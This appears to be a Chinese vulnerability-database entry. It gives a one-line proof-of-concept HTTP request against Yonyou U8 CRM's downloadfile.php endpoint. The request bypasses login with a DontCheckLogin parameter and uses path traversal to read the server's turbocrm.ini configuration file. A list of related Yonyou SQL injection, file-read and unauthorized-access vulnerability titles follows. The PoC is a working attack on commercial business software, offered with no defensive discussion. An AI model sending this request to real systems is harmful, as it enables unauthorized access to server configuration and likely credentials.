PoC代码 复制 GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini HTTP/1.1
相关漏洞推荐 用友U8 CRM /background/reservationcomplete.php 未授权访问漏洞 用友U8Cloud /u8cloud/yls SQL 注入漏洞 用友U8Cloud /u8cloud/openapi/ce.paper.query SQL 注入漏洞 用友 U8Cloud /u8cloud/api/hrta/returnaway/submit SQL 注入漏洞 用友U8 CRM /lead/leadconversion.php SQL 注入漏洞 友加畅捷管理系统 /Controllers/ajax/downloadfile.ashx 文件读取漏洞 用友 U8 CRM /ajax/getsrvtemplate.php/getproductdata SQL 注入漏洞 用友U8 CRM getsrvtemplate.php SQL注入漏洞 友加畅捷管理系统 downloadfile.ashx 任意文件读取漏洞 用友U8 渠道管理(高级版) /NCSaleOut2CRMAuditServlet SQL 注入漏洞 用友U8 Cloud /service/FileManageServlet 文件读取漏洞 友加畅捷管理系统 downloadfile.ashx 存在文件读取漏洞 用友U8CRM 存在SQL注入